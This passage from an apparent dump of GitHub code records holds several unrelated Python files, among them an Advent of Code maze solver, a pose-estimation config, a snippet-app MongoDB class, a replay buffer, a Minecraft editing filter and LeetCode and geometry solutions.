#.#.#.......#...#.....#.#.#...#\n# #.#########.###.#####.#.#.###.#\n# #.............#.#.....#.......#\n# ###.###########.###.#####.#.#.#\n# #.....# A C #.#.#.#\n# ####### S P #####.#\n# #.#...# #......VT\n# #.#.#.# #.#####\n# #...#.# YN....#.#\n# #.###.# #####.#\n# DI....#.# #.....#\n# #####.# #.###.#\n# ZZ......# QG....#..AS\n# ###.### #######\n# JO..#.#.# #.....#\n# #.#.#.# ###.#.#\n# #...#..DI BU....#..LF\n# #####.# #.#####\n# YN......# VT..#....QG\n# #.###.# #.###.#\n# #.#...# #.....#\n# ###.### J L J #.#.###\n# #.....# O F P #.#...#\n# #.###.#####.#.#####.#####.###.#\n# #...#.#.#...#.....#.....#.#...#\n# #.#####.###.###.#.#.#########.#\n# #...#.#.....#...#.#.#.#.....#.#\n# #.###.#####.###.###.#.#.#######\n# #.#.........#...#.............#\n# #########.###.###.#############\n# B J C\n# U P P\n# \"\"\", size=P(35, 37), hole_position=P(9,9), hole_size=P(17, 19))\n# # print(list(s.graph.nodes()))\n# # print(list(s.graph.edges()))\n# # print(s.path(P(19,2), P(17, 8))) ## AA AS\n# # print(s.path(P(19,2), P(32, 17))) ## AA AS\n# assert s.shortest_path() == 58\n\n# s = Maze.parse(open(\"day20/input1.txt\").read(), size=P(121, 125), hole_position=P(33,33), hole_size=P(55, 59))\n# print(s.shortest_path())\n\n# s = Maze.parse(\"\"\"\n# Z L X W C\n# Z P Q B K\n# ###########.#.#.#.#######.###############\n# #...#.......#.#.......#.#.......#.#.#...#\n# ###.#.#.#.#.#.#.#.###.#.#.#######.#.#.###\n# #.#...#.#.#...#.#.#...#...#...#.#.......#\n# #.###.#######.###.###.#.###.###.#.#######\n# #...#.......#.#...#...#.............#...#\n# #.#########.#######.#.#######.#######.###\n# #...#.# F R I Z #.#.#.#\n# #.###.# D E C H #.#.#.#\n# #.#...# #...#.#\n# #.###.# #.###.#\n# #.#....OA WB..#.#..ZH\n# #.###.# #.#.#.#\n# CJ......# #.....#\n# ####### #######\n# #.#....CK #......IC\n# #.###.# #.###.#\n# #.....# #...#.#\n# ###.### #.#.#.#\n# XF....#.# RF..#.#.#\n# #####.# #######\n# #......CJ NM..#...#\n# ###.#.# #.###.#\n# RE....#.# #......RF\n# ###.### X X L #.#.#.#\n# #.....# F Q P #.#.#.#\n# ###.###########.###.#######.#########.###\n# #.....#...#.....#.......#...#.....#.#...#\n# 
#####.#.###.#######.#######.###.###.#.#.#\n# #.......#.......#.#.#.#.#...#...#...#.#.#\n# #####.###.#####.#.#.#.#.###.###.#.###.###\n# #.......#.....#.#...#...............#...#\n# #############.#.#.###.###################\n# A O F N\n# A A D M\n# \"\"\", size=P(45, 37), hole_position=P(9,9), hole_size=P(27, 19))\n# assert s.shortest_path() == 396\n\n\ns = Maze.parse(open(\"day20/input1.txt\").read(), size=P(121, 125), hole_position=P(33,33), hole_size=P(55, 59))\nprint(s.shortest_path())\n","repo_name":"kmamykin/adventofcode2019","sub_path":"day20/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":10330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1144169988","text":"_base_ = [\"./common_base.py\", \"./renderer_base.py\"]\n# -----------------------------------------------------------------------------\n# base model cfg for self6d-v2\n# -----------------------------------------------------------------------------\n\nrefiner_cfg_path = \"configs/_base_/self6dpp_refiner_base.py\"\n\nMODEL = dict(\n DEVICE=\"cuda\",\n WEIGHTS=\"\",\n REFINER_WEIGHTS=\"\",\n PIXEL_MEAN=[0, 0, 0], # to [0,1]\n PIXEL_STD=[255.0, 255.0, 255.0],\n SELF_TRAIN=False, # whether to do self-supervised training\n FREEZE_BN=False, # use frozen_bn for self-supervised training\n WITH_REFINER=False, # whether to use refiner\n # -----------\n LOAD_DETS_TRAIN=False, # NOTE: load detections for self-train\n LOAD_DETS_TRAIN_WITH_POSE=False, # load detections with pose_refine as pseudo pose\n PSEUDO_POSE_TYPE=\"pose_refine\", # pose_est | pose_refine | pose_init (online inferred by teacher)\n LOAD_DETS_TEST=False,\n BBOX_CROP_REAL=False, # whether to use bbox_128, for cropped lm\n BBOX_CROP_SYN=False,\n # -----------\n # Model Exponential Moving Average https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage\n # NOTE: momentum-based mean teacher\n EMA=dict(\n ENABLED=False,\n INIT_CFG=dict(decay=0.999, updates=0), # epoch-based\n UPDATE_FREQ=10, # update the mean teacher every n epochs\n ),\n POSE_NET=dict(\n NAME=\"GDRN\", # used module file name\n # NOTE: for self-supervised training phase, use offline labels should be more accurate\n XYZ_ONLINE=False, # rendering xyz online\n XYZ_BP=True, # calculate xyz from depth by backprojection\n NUM_CLASSES=13,\n USE_MTL=False, # uncertainty multi-task weighting, TODO: implement for self loss\n INPUT_RES=256,\n OUTPUT_RES=64,\n ## backbone\n BACKBONE=dict(\n FREEZE=False,\n PRETRAINED=\"timm\",\n INIT_CFG=dict(\n type=\"timm/resnet34\",\n pretrained=True,\n in_chans=3,\n features_only=True,\n out_indices=(4,),\n ),\n ),\n NECK=dict(\n ENABLED=False,\n FREEZE=False,\n LR_MULT=1.0,\n INIT_CFG=dict(\n type=\"FPN\",\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=4,\n ),\n ),\n ## geo head: Mask, XYZ, Region\n GEO_HEAD=dict(\n FREEZE=False,\n LR_MULT=1.0,\n INIT_CFG=dict(\n type=\"TopDownMaskXyzRegionHead\",\n in_dim=512, # this is num out channels of backbone conv feature\n up_types=(\"deconv\", \"bilinear\", \"bilinear\"), # stride 32 to 4\n deconv_kernel_size=3,\n num_conv_per_block=2,\n feat_dim=256,\n feat_kernel_size=3,\n norm=\"GN\",\n num_gn_groups=32,\n act=\"GELU\", # relu | lrelu | silu (swish) | gelu | mish\n out_kernel_size=1,\n out_layer_shared=True,\n ),\n XYZ_BIN=64, # for classification xyz, the last one is bg\n XYZ_CLASS_AWARE=False,\n MASK_CLASS_AWARE=False,\n REGION_CLASS_AWARE=False,\n MASK_THR_TEST=0.5,\n # for region classification, 0 is 
bg, [1, num_regions]\n # num_regions <= 1: no region classification\n NUM_REGIONS=64,\n ),\n ## for direct regression\n PNP_NET=dict(\n FREEZE=False,\n TRAIN_R_ONLY=False, # only train fc_r (only valid when FREEZE=False)\n LR_MULT=1.0,\n # ConvPnPNet | SimplePointPnPNet | PointPnPNet | ResPointPnPNet\n INIT_CFG=dict(\n type=\"ConvPnPNet\",\n norm=\"GN\",\n act=\"relu\",\n num_gn_groups=32,\n drop_prob=0.0, # 0.25\n denormalize_by_extent=True,\n ),\n WITH_2D_COORD=False, # using 2D XY coords\n COORD_2D_TYPE=\"abs\", # rel | abs\n REGION_ATTENTION=False, # region attention\n MASK_ATTENTION=\"none\", # none | concat | mul\n ROT_TYPE=\"ego_rot6d\", # {allo/ego}_{quat/rot6d/log_quat/lie_vec}\n TRANS_TYPE=\"centroid_z\", # trans | centroid_z (SITE) | centroid_z_abs\n Z_TYPE=\"REL\", # REL | ABS | LOG | NEG_LOG (only valid for centroid_z)\n ),\n LOSS_CFG=dict(\n # xyz loss ----------------------------\n XYZ_LOSS_TYPE=\"L1\", # L1 | CE_coor\n XYZ_LOSS_MASK_GT=\"visib\", # trunc | visib | obj\n XYZ_LW=1.0,\n # full mask loss ---------------------------\n FULL_MASK_LOSS_TYPE=\"BCE\", # L1 | BCE | CE\n FULL_MASK_LW=0.0,\n # mask loss ---------------------------\n MASK_LOSS_TYPE=\"L1\", # L1 | BCE | CE | RW_BCE | dice\n MASK_LOSS_GT=\"trunc\", # trunc | visib | gt\n MASK_LW=1.0,\n # region loss -------------------------\n REGION_LOSS_TYPE=\"CE\", # CE\n REGION_LOSS_MASK_GT=\"visib\", # trunc | visib | obj\n REGION_LW=1.0,\n # point matching loss -----------------\n NUM_PM_POINTS=3000,\n PM_LOSS_TYPE=\"L1\", # L1 | Smooth_L1\n PM_SMOOTH_L1_BETA=1.0,\n PM_LOSS_SYM=False, # use symmetric PM loss\n PM_NORM_BY_EXTENT=False, # 10. / extent.max(1, keepdim=True)[0]\n # if False, the trans loss is in point matching loss\n PM_R_ONLY=True, # only do R loss in PM\n PM_DISENTANGLE_T=False, # disentangle R/T\n PM_DISENTANGLE_Z=False, # disentangle R/xy/z\n PM_T_USE_POINTS=True,\n PM_LW=1.0,\n # rot loss ----------------------------\n ROT_LOSS_TYPE=\"angular\", # angular | L2\n ROT_LW=0.0,\n # centroid loss -----------------------\n CENTROID_LOSS_TYPE=\"L1\",\n CENTROID_LW=1.0,\n # z loss ------------------------------\n Z_LOSS_TYPE=\"L1\",\n Z_LW=1.0,\n # trans loss --------------------------\n TRANS_LOSS_TYPE=\"L1\",\n TRANS_LOSS_DISENTANGLE=True,\n TRANS_LW=0.0,\n # bind term loss: R^T@t ---------------\n BIND_LOSS_TYPE=\"L1\",\n BIND_LW=0.0,\n ),\n SELF_LOSS_CFG=dict(\n # LAB space loss ------------------\n LAB_NO_L=True,\n LAB_LW=0.0,\n # MS-SSIM loss --------------------\n MS_SSIM_LW=0.0,\n # perceptual loss -----------------\n # PERCEPT_CFG=\n PERCEPT_LW=0.0,\n # mask loss (init, ren) -----------------------\n MASK_WEIGHT_TYPE=\"edge_lower\", # none | edge_lower | edge_higher\n MASK_INIT_REN_LOSS_TYPE=\"RW_BCE\", # L1 | RW_BCE (re-weighted BCE) | dice\n MASK_INIT_REN_LW=1.0,\n # depth-based geometric loss ------\n GEOM_LOSS_TYPE=\"chamfer\", # L1, chamfer\n GEOM_LW=0.0, # 100\n CHAMFER_CENTER_LW=0.0,\n CHAMFER_DIST_THR=0.5,\n # refiner-based loss --------------\n REFINE_LW=0.0,\n # xyz loss (init, ren)\n XYZ_INIT_REN_LOSS_TYPE=\"L1\", # L1 | CE_coor (for cls)\n XYZ_INIT_REN_LW=0.0,\n # xyz loss (init, pred)\n XYZ_INIT_PRED_LOSS_TYPE=\"L1\", # L1 | smoothL1\n XYZ_INIT_PRED_LW=0.0,\n # region loss\n REGION_INIT_PRED_LW=0.0,\n # losses between init and pred ==========================\n # mask loss (init, pred) -----------------------\n MASK_TYPE=\"vis\", # vis | full\n MASK_INIT_PRED_LOSS_TYPE=\"RW_BCE\", # L1 | RW_BCE (re-weighted BCE)\n MASK_INIT_PRED_LW=0.0,\n MASK_INIT_PRED_TYPE=(\"vis\",), # 
(\"vis\",\"full\",)\n # point matching loss using pseudo pose ---------------------------\n SELF_PM_CFG=dict(\n loss_type=\"L1\",\n beta=1.0,\n reduction=\"mean\",\n loss_weight=0.0, # NOTE: >0 to enable this loss\n norm_by_extent=False,\n symmetric=True,\n disentangle_t=True,\n disentangle_z=True,\n t_loss_use_points=True,\n r_only=False,\n ),\n ),\n ),\n # some d2 keys but not used\n KEYPOINT_ON=False,\n LOAD_PROPOSALS=False,\n)\n\nTRAIN = dict(PRINT_FREQ=20, DEBUG_SINGLE_IM=False)\n\nTEST = dict(\n EVAL_PERIOD=0,\n VIS=False,\n TEST_BBOX_TYPE=\"est\", # gt | est\n USE_PNP=False, # use pnp or direct prediction\n SAVE_RESULTS_ONLY=False, # turn this on to only save the predicted results\n # ransac_pnp | net_iter_pnp (learned pnp init + iter pnp) | net_ransac_pnp (net init + ransac pnp)\n # net_ransac_pnp_rot (net_init + ransanc pnp --> net t + pnp R)\n PNP_TYPE=\"ransac_pnp\",\n PRECISE_BN=dict(ENABLED=False, NUM_ITER=200),\n)\n","repo_name":"THU-DA-6D-Pose-Group/self6dpp","sub_path":"configs/_base_/self6dpp_base.py","file_name":"self6dpp_base.py","file_ext":"py","file_size_in_byte":9078,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"16"} +{"seq_id":"1288579948","text":"import h5py # Store data files in .h5 format\nimport numpy as np\nimport pandas as pd\nfrom glob import glob # Read data files stored in pathnames following a pattern.\nimport matplotlib.pyplot as plt\n\n\ntrain_data_list , train_label_list = [],[]\ntest_data_list = []\n\n# Read training label from the CSV file\n\ndf_train_label = pd.read_csv('training_labels.csv')\n\n\n\n# read datfiles stored in folders based on the properties of BH signal\npaths_files = glob(\"test/*/*/*/*\")\npaths_files.sort()\n\nprint(paths_files[:10]) # To check everything is ok\n\ntrain_data = np.load(paths_files[0])\n\n\nfor i in range(560000):\n\ttrain_data_list.extend([np.load(paths_files[i]).T])\n\ttrain_label_list.append(df_train_label['target'][i])\n\n\ntrain_data = np.array(train_data_list)\ntrain_label = np.array(train_label_list)\ntrain_label.reshape((560000,1))\ndel train_data_list\ndel train_label_list\n\n# Check for the correct shapes\nprint(train_data.shape)\nprint(train_label.shape)\n\n# Store as HD5 file\nh5f1 = h5py.File('training_trial.h5', 'w')\nh5f1.create_dataset('train_data', data=train_data)\nh5f1.create_dataset('train_label', data=train_label)\nh5f1.close()","repo_name":"kpal002/Gravitational_Wave_Detection","sub_path":"Data_Mining_Project/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5658581782","text":"from pymongo import MongoClient\nfrom uuid import uuid4\nimport random\nimport datetime\nimport requests\n\nclass Database:\n def __init__(self, URL, AIRKEY):\n self.client = MongoClient(URL)\n self.db = self.client.Snipper\n self.users = self.db.users\n self.snips = self.db.snips\n \n def addUser(self, email):\n name = requests.get('http://names.drycodes.com/1').json()[0]\n id =str(uuid4())\n self.users.insert_one({\n '_id': id,\n 'username': name,\n 'email': email,\n 'avatar': f'https://avatars.dicebear.com/api/bottts/{id}.svg',\n 'snips': [],\n 'saves': [],\n 'created': datetime.datetime.now().strftime(\"%d %B %Y, %I:%M:%S %p\")\n })\n \n def userExists(self, email):\n return self.users.find_one({'email': email}) is not None\n \n def getUser(self, email):\n return self.users.find_one({'email': email})\n \n def getUserWithId(self, 
id):\n return self.users.find_one({'_id': id})\n \n def updateName(self, email, name):\n self.users.update_one({'email': email}, {'$set': {'username': name}})\n return True\n \n def uploadSnip(self, email, snip, name, description, language, theme):\n id = str(uuid4())\n user = self.getUser(email)\n self.snips.insert_one({\n '_id': id,\n 'by': email,\n 'name': name,\n 'description': description,\n 'snip': snip,\n 'language': language,\n 'theme': theme,\n 'created': datetime.datetime.now().strftime(\"%d %B %Y, %I:%M:%S %p\")\n })\n self.users.update_one({'_id': user['_id']}, {'$push': {'snips': id}})\n return id\n \n def getSnip(self, id):\n snip = self.snips.find_one({'_id': id})\n snip['by'] = self.getUser(snip['by'])\n return snip\n # return \n \n def getUserSnips(self, email):\n user = self.getUser(email)\n return [self.getSnip(snip) for snip in user['snips']]\n \n def saveSnip(self, snipId, email):\n user = self.getUser(email)\n if snipId in user['saves']:\n return False\n self.users.update_one({'_id': user['_id']}, {'$push': {'saves': snipId}})\n return True\n \n def removeSnip(self, snipId, email):\n user = self.getUser(email)\n if snipId not in user['saves']:\n return False\n self.users.update_one({'_id': user['_id']}, {'$pull': {'saves': snipId}})\n return True\n \n def delteSnip(self, snipId, email):\n user = self.getUser(email)\n self.snips.delete_one({'_id': snipId})\n self.users.update_one({'_id': user['_id']}, {'$pull': {'snips': snipId}})\n \n def get10RandomSnips(self):\n snips = self.snips.aggregate([\n {'$sample': {'size': 10}}\n ])\n return list(snips)","repo_name":"studiousgamer/Snipper","sub_path":"databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"8817895326","text":"from django.urls import path\nfrom post.views import index, NewPost, PostDetails, tags, like, favorite\n\n\nurlpatterns = [\n \tpath('', index, name='index'),\n \tpath('newpost/', NewPost, name='newpost'),\n \tpath('', PostDetails, name='postdetails'),\n \tpath('/like', like, name='postlike'),\n \tpath('/favorite', favorite, name='postfavorite'),\n \tpath('tag/', tags, name='tags'),\n]","repo_name":"byronlara5/django_instagram_clone_youtube","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"16"} +{"seq_id":"11341301030","text":"#!/usr/bin/python3\n# evaluate if the year entered is leep year or not\ndef is_leap(year):\n leap = False\n if year % 4 == 0:\n if year % 100 == 0:\n if year % 400 == 0:\n return True\n else:\n return False\n return True\n\n return leap\n\nyear = int(input())\nprint(is_leap(year))\n","repo_name":"ikramawol/21-day-challenge-for-python","sub_path":"leep_year.py","file_name":"leep_year.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13907200665","text":"import networkx as nx\nimport numpy as np\nimport random as rd\nimport operator as op\nimport graphgenerator as gg\n\n\n\n\nvar1=[]\ngseq1=[]\nnum1=np.zeros(12)\nfor i in range(12):\n seq=[]\n for j in range(10):\n a=rd.randint(1,9)\n seq.append(a)\n dic=gg.list_to_dic(seq)\n try:\n g1=gg.heat_heter_graph(dic)\n if not(nx.is_connected(g1)):\n num1[i]=1\n except:\n num1[i]=2\n g1=nx.complete_graph(10)\n temp1=gm.Temp_var(g1)\n 
var1.append(temp1)\n","repo_name":"shaolintan/Evolutionary-Games-on-Complex-Networks","sub_path":"Pairwise interaction games/test7.py","file_name":"test7.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"16658871601","text":"import numpy as np\nfrom game import Map\n\nclass ReplayBuffer():\n def __init__(self, frameHeight, frameWidth, maxSize, historyLength, batchSize):\n self.historyLength = historyLength\n self.current = 0\n self.currentSize = 0\n self.maxSize = maxSize\n self.batchSize = batchSize\n self.frameHeight = frameHeight\n self.frameWidth = frameWidth\n\n self.frames = np.zeros((maxSize, self.frameHeight, self.frameWidth), dtype=np.uint8)\n self.actions = np.zeros(maxSize, dtype=np.int32)\n self.rewards = np.zeros(maxSize, dtype=np.int32)\n self.done = np.zeros(maxSize, dtype=np.bool)\n\n self.states = np.empty((self.batchSize, self.historyLength, \n self.frameHeight, self.frameWidth), dtype=np.uint8)\n self.new_states = np.empty((self.batchSize, self.historyLength, \n self.frameHeight, self.frameWidth), dtype=np.uint8)\n self.indices = np.empty(self.batchSize, dtype=np.int32)\n\n def add_experience(self, frame, action, reward, done):\n self.frames[self.current] = frame\n self.actions[self.current] = action\n self.rewards[self.current] = reward\n self.done[self.current] = done\n\n self.current = (self.current+1) % self.maxSize\n self.currentSize = min(self.currentSize+1, self.maxSize)\n\n def get_random_index(self):\n while True:\n idx = np.random.randint(self.historyLength, self.currentSize - 1)\n if idx < self.historyLength + 1:\n continue\n if idx >= self.current and idx - self.historyLength <= self.current:\n continue\n if self.done[idx - self.historyLength:idx].any():\n continue\n break\n return idx\n\n def sample_batch(self):\n if self.currentSize < self.historyLength:\n raise ValueError('Not enough memories to get a minibatch')\n\n for i in range(self.batchSize):\n idx = self.get_random_index()\n self.indices[i] = idx\n\n for i, idx in enumerate(self.indices):\n self.states[i] = self.get_state(idx - 1)\n self.new_states[i] = self.get_state(idx)\n\n return self.states, \\\n self.actions[self.indices], \\\n self.rewards[self.indices], \\\n self.new_states, \\\n self.done[self.indices]\n \n def get_state(self, index):\n if index > self.historyLength - 1:\n return self.frames[index - self.historyLength+1:index+1, ...]\n ","repo_name":"chenalan02/BulletDodge-RL","sub_path":"replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"23750348944","text":"# from logging import root\nfrom tkinter import *\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\n\n# Create simple linear regression model for sequence prediction\ndata=[i for i in range(101)]\nx=[]\ny=[]\n\nfor i in range(len(data)):\n end=i+1\n if end>=len(data):break\n x.append(data[i:end])\n y.append(data[end])\n\nx=np.array(x)\ny=np.array(y)\n\n# Tkinter GUI for for fresh predictions\nmodel=LinearRegression()\nmodel.fit(x,y)\nroot=Tk()\n\nroot.geometry('500x200')\nroot.configure(bg='pink')\n\nroot.title('A Dirty Simple Linear regression')\n\n# Integer Input\nnum=IntVar()\nent=Entry(root,textvariable=num,justify='center',font='Stencil_Std 13')\nent.grid(column=0,row=0,columnspan=2,rowspan=2,sticky='NSEW')\n\n# Entry 
Label\nlab_ent=Label(root)\nlab_ent.grid(column=3,row=0,columnspan=2,rowspan=2)\nlab_ent.config(background='Blue',foreground=\"black\",text=\"Enter the value to predict\",font=('Bold'))\n\n# Label to display the prediction\nlab=Label(root)\nlab.grid(column=0,row=3,columnspan=2,rowspan=2,sticky='NSEW')\n\n# Label to display Prediction\nlab_ent=Label(root)\nlab_ent.grid(column=3,row=3,columnspan=2,rowspan=2,sticky='NSEW')\nlab_ent.config(background='Blue',foreground=\"black\",text=\"The Predicted Value\",font=('Bold'),borderwidth=5,border=2)\n\n\ndef l(event):\n value=num.get()\n predict=model.predict(np.array(value).reshape(1,-1))\n print(predict)\n lab.config(text=round(predict[0],1),background='yellow',font=('Bold'))\n\nent.bind('',l)\n# def lab_value(event):\n# lab.set\n \n\nroot.mainloop()","repo_name":"slmsshk/Data_Science-_Dummy","sub_path":"SLR/Dirty_SLR.py","file_name":"Dirty_SLR.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"17165328476","text":"# MCEdit filter created by TheDestruc7i0n\n# http://youtube.com/TheDestruc7i0n\n\nfrom pymclevel import TAG_List\nfrom pymclevel import TAG_Byte\nfrom pymclevel import TAG_Int\nfrom pymclevel import TAG_Compound\nfrom pymclevel import TAG_Short\nfrom pymclevel import TAG_Double\nfrom pymclevel import TAG_String\n\ndisplayName = \"1.7 CTI\"\n\ndef fixedString(s):\n\tchars = list(s)\n\tpref = []\n\tnewStr = \"\"\n\tformat = unichr(167)\n\t\n\ti = 0\n\tfor c in chars:\n\t\tif c == \"&\":\n\t\t\tif chars[i+1] != \"r\":\n\t\t\t\tpref.append(chars[i+1])\n\t\t\telse:\n\t\t\t\tpref = [\"r\"]\n\t\t\tdel(chars[i+1])\n\t\telif c != \" \":\n\t\t\tfor code in pref:\n\t\t\t\tnewStr += format + code\n\t\t\tx = 0\n\t\t\tfor cd in pref:\n\t\t\t\tif cd == \"r\":\n\t\t\t\t\tdel(pref[x])\n\t\t\t\tx += 1\n\t\t\t\t\t\n\t\t\t\t\n\t\t\tnewStr += c\n\t\telse:\n\t\t\tnewStr += c\n\t\t\n\t\ti += 1\n\t\t\n\treturn newStr\n\t\t\t\n\t\t\n\t\n\t\t\t\ndef perform(level, box, options):\n\tfor (chunk, slices, point) in level.getChunkSlices(box):\n\t\tfor e in chunk.Entities:\n\t\t\tx = e[\"Pos\"][0].value\n\t\t\ty = e[\"Pos\"][1].value\n\t\t\tz = e[\"Pos\"][2].value\n\t\t\t\n\t\t\tif x >= box.minx and x < box.maxx and y >= box.miny and y < box.maxy and z >= box.minz and z < box.maxz:\n\t\t\t\tif e[\"id\"].value == \"MinecartCommandBlock\":\n\t\t\t\t\t\tcmd = e[\"Command\"].value\n\t\t\t\t\t\tnewcmd = fixedString(cmd)\n\t\t\t\t\t\tif newcmd != cmd:\n\t\t\t\t\t\t\te[\"Command\"] = TAG_String(newcmd)\n\t\t\t\t\t\t\tchunk.dirty = True\n\t\t\t\t\t\t\t\n\t\tfor t in chunk.TileEntities:\n\t\t\tx = t[\"x\"].value\n\t\t\ty = t[\"y\"].value\n\t\t\tz = t[\"z\"].value\n\t\t\t\t\n\t\t\tif x >= box.minx and x < box.maxx and y >= box.miny and y < box.maxy and z >= box.minz and z < box.maxz:\n\t\t\t\tif t[\"id\"].value == \"Sign\":\n\t\t\t\t\tfor l in range(1, 5):\n\t\t\t\t\t\tline = t[\"Text\" + str(l)].value\n\t\t\t\t\t\tnewline = fixedString(line)\n\t\t\t\t\t\tif line != newline:\n\t\t\t\t\t\t\tt[\"Text\" + str(l)] = TAG_String(newline)\n\t\t\t\t\t\t\tchunk.dirty = True\n\t\t\t\tif t[\"id\"].value == \"Control\":\n\t\t\t\t\tcmd = t[\"Command\"].value\n\t\t\t\t\tnewcmd = fixedString(cmd)\n\t\t\t\t\tif newcmd != cmd:\n\t\t\t\t\t\tt[\"Command\"] = TAG_String(newcmd)\n\t\t\t\t\t\tchunk.dirty = 
True\n","repo_name":"destruc7i0n/TDMCEditFilters","sub_path":"17CTI.py","file_name":"17CTI.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44789457739","text":"\"\"\"\n给你一个会议时间安排的数组 intervals ,每个会议时间都会包括开始和结束的时间 intervals[i] = [starti, endi] ,为避免会议冲突,同时要考虑充分利用会议室资源,请你计算至少需要多少间会议室,才能满足这些会议安排。\n\n \n\n示例 1:\n\n输入:intervals = [[0,30],[5,10],[15,20]]\n输出:2\n示例 2:\n\n输入:intervals = [[7,10],[2,4]]\n输出:1\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/meeting-rooms-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\"\"\"\nimport heapq\nfrom typing import List\n\n# 2021.03.04 直奔题解的一天\n# 利用最小堆\nclass Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n\n # If there is no meeting to schedule then no room needs to be allocated.\n if not intervals:\n return 0\n\n # The heap initialization\n free_rooms = []\n\n # Sort the meetings in increasing order of their start time.\n intervals.sort(key= lambda x: x[0])\n\n # Add the first meeting. We have to give a new room to the first meeting.\n heapq.heappush(free_rooms, intervals[0][1])\n\n # For all the remaining meeting rooms\n for i in intervals[1:]:\n\n # If the room due to free up the earliest is free, assign that room to this meeting.\n if free_rooms[0] <= i[0]:\n heapq.heappop(free_rooms)\n\n # If a new room is to be assigned, then also we add to the heap,\n # If an old room is allocated, then also we have to add to the heap with updated end time.\n heapq.heappush(free_rooms, i[1])\n\n # The size of the heap tells us the minimum rooms required for all the meetings.\n return len(free_rooms)\n\n# 时间复杂度:O(NlogN) 。时间开销主要有两部分。第一部分是数组的 排序 过程,消耗 (NlogN) 的时间。数组中有 NN 个元素。\n# 接下来是 最小堆 占用的时间。在最坏的情况下,全部 NN 个会议都会互相冲突。在任何情况下,我们都要向堆执行 NN 次插入操作。在最坏的情况下,我们要对堆进行 NN 次查找并删除最小值操作。总的时间复杂度为 (NlogN),因为查找并删除最小值操作只消耗 O(logN) 的时间。\n# 空间复杂度:O(N) 。额外空间用于建立 最小堆 。在最坏的情况下,堆需要容纳全部 NN 个元素。因此空间复杂度为 O(N) 。\n\n# 2021.03.20 磕磕绊绊,总算写出来了\nclass Solution1:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n intervals.sort(key=lambda x: x[0])\n arr = [intervals[0][1]]\n heapq.heapify(arr)\n for i in intervals[1:]:\n if i[0] >= arr[0]:\n heapq.heappop(arr)\n heapq.heappush(arr, i[1])\n \n return len(arr)","repo_name":"ZhiyuSun/leetcode-practice","sub_path":"201-300/253_会议室II.py","file_name":"253_会议室II.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"28387726027","text":"import numpy as np\nfrom numpy.linalg import norm\nfrom shapely.plotting import plot_polygon\nfrom shapely import Point, Polygon\nimport matplotlib.pyplot as plt\nimport re\n\n\n\ndef point_is_inside_polygon(point: Point, polygon: Polygon) -> bool:\n \"\"\"function to check if a point lies inside a polygon\n\n Args:\n point (Point): point to check\n polygon (Polygon): polygon being checked against\n\n Returns:\n bool: returns true if point is inside polygon; returns false if point is outside polygon\n \"\"\" \n point = Point(point) \n polygon = Polygon(polygon)\n print('point is inside polygon: ', point.within(polygon))\n return point.within(polygon)\n\n\n\ndef polygon_is_valid(vertices: np.array) -> bool:\n \"\"\"function to check if a polygon is valid\n\n Args:\n vertices (np.array): polygon vertices being checked\n\n Returns:\n bool: returns true if polygon is a valid polygon; returns false if it is an invalid polygon (has less than 3 vertices or self-intersects)\n \"\"\" \n n = 
len(vertices)\n if n < 3:\n print('valid: False')\n return False\n \n # loop to iterate over each vertex of the polygon\n for i in range(n):\n # variable for the current vertex in the loop\n p1 = vertices[i]\n # variable for the next vertex in the loop\n p2 = vertices[(i + 1) % n]\n # nested loop to iterate over the remaining vertices in the polygon\n for j in range(i + 2, n + i - 1):\n # variable for the current vertex in the nested loop\n p3 = vertices[j % n]\n # variable for the next vertex in the nested loop\n p4 = vertices[(j + 1) % n]\n # check if current edge intersects with another edge in the polygon\n if intersect(p1, p2, p3, p4):\n print('valid: False')\n return False\n print('valid: True')\n return True\n\n\n\ndef intersect(p1: np.array, p2: np.array, p3: np.array, p4: np.array) -> bool:\n \"\"\"function to check if the lines intersect\n\n Args:\n p1 (np.array): first point checked\n p2 (np.array): second point checked\n p3 (np.array): third point checked\n p4 (np.array): fourth point checked\n\n Returns:\n bool: returns true if the lines intersect; returns false if they do not intersect\n \"\"\" \n # calculates the determinant of a matrix formed by two vectors, which is used to check if the two lines formed by the points intersect\n d = (p4[1] - p3[1]) * (p2[0] - p1[0]) - (p4[0] - p3[0]) * (p2[1] - p1[1])\n # if lines don't intersect, return false\n if d == 0:\n return False\n # check if the lines intersect\n u = ((p3[0] - p1[0]) * (p2[1] - p1[1]) - (p3[1] - p1[1]) * (p2[0] - p1[0])) / d\n v = ((p3[0] - p1[0]) * (p4[1] - p3[1]) - (p3[1] - p1[1]) * (p4[0] - 